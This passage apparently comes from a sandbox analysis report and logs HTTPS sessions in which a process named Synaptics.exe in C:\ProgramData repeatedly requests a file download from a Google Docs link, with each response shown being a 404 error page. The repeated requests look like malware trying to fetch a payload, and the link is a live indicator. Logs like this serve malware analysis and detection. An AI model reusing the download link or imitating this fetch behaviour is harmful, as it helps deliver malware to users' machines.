                                                                                                                                                                                        2022-05-17 11:31:31 UTC45INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 33 38 4e 6f 51 71 4f 79 33 6d 42 6e 69 69 33 72 6d 44 63 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K38NoQqOy3mBnii3rmDcpw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:31 UTC47INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:31 UTC47INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        140192.168.2.349903142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC426OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC429INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-neXl10HRig2Xm5PqfBTwKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC431INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:48 UTC431INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4c 50 71 68 6c 51 32 4b 61 34 4a 42 45 55 41 79 6b 54 63 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jLPqhlQ2Ka4JBEUAykTceQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:48 UTC432INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:48 UTC432INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        141192.168.2.349904142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC429OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC432INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MhGhlgCwcoqo6dYeYV/u/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC434INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:49 UTC434INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 57 38 41 74 42 43 6b 54 69 4c 73 72 45 4f 71 44 67 48 39 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jW8AtBCkTiLsrEOqDgH9dw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:49 UTC435INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:49 UTC435INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        142192.168.2.349905142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC432OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC435INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-KHDjoEj7fxYk2/8dIo/OuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC437INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 4d 31 55 77 35 46 54 30 69 61 4b 39 56 4e 51 6d 50 37 59 49 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5M1Uw5FT0iaK9VNQmP7YIw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:49 UTC438INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:49 UTC438INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        143192.168.2.349907142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC435OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC439INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-UaIsK1dRXNTxqsFygui3jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC440INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 7a 79 65 68 47 75 4d 7a 4a 63 32 2f 4f 62 7a 4b 30 66 68 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qzyehGuMzJc2/ObzK0fhqQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:49 UTC441INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:49 UTC442INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        144192.168.2.349908142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC438OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC442INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-w4ZmLuo4O1BWadlvJsa2cA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC443INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:49 UTC443INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 70 79 51 4a 4b 4a 78 57 62 59 5a 36 53 69 76 48 66 35 79 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
